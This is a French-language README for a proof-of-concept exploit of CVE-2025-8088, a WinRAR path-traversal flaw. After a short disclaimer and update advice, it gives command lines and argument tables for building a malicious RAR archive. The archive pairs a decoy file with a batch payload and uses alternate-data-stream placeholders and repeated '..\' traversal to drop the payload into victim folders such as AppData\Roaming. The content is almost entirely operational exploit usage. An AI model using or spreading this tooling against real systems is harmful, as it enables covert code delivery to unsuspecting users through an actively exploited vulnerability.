
Ce PoC est destiné à une étude et un test autorisés. CVE-2025-8088 est activement exploitée, et une utilisation abusive peut enfreindre les lois ou causer des dommages. Mettez à jour vers WinRAR 7.13+ pour éviter les RAR suspects.
Exploit_cve_2025_8088.ps1
python poc.py

# Basic usage (auto-discover rar.exe)
python poc.py --decoy resume.txt --payload payload.bat --drop "C:\Users\Victim\Documents"
# Full custom configuration
python poc.py \
--decoy document.pdf \
--payload script.bat \
--drop "C:\Users\Victim\AppData\Roaming" \
--rar "C:\Program Files\WinRAR\rar.exe" \
--out malicious.rar \
--workdir ./build \
--placeholder_len 150 \
--max_up 20
| Argument | Description | Exemple |
|---|
--decoy | Chemin vers le fichier leurre (créé s'il n'existe pas) | resume.txt |
--payload | Chemin vers le fichier payload (créé s'il n'existe pas) | payload.bat |
--drop | Chemin absolu vers le répertoire cible où le payload sera extrait | C:\Users\Victim\Documents |
| Argument | Description | Valeur par défaut | Notes |
|---|
--rar | Chemin vers rar.exe | Découvert automatiquement | Vérifiera les emplacements courants et le PATH |
--out | Nom du fichier RAR de sortie | poc-cve-2025-8088.rar | Archive malveillante finale |
--workdir | Répertoire de travail pour les fichiers temporaires | Répertoire courant (.) | |
--placeholder_len | Longueur du placeholder ADS | max(len(target_path), 128) | Plus long = traversée plus fiable |
--max_up | Nombre de traversées de répertoire parent (..\) | 16 | Minimum 8 recommandé |
--base_out | Nom de fichier RAR de base intermédiaire | <out>.base.rar | Fichier temporaire, supprimé après |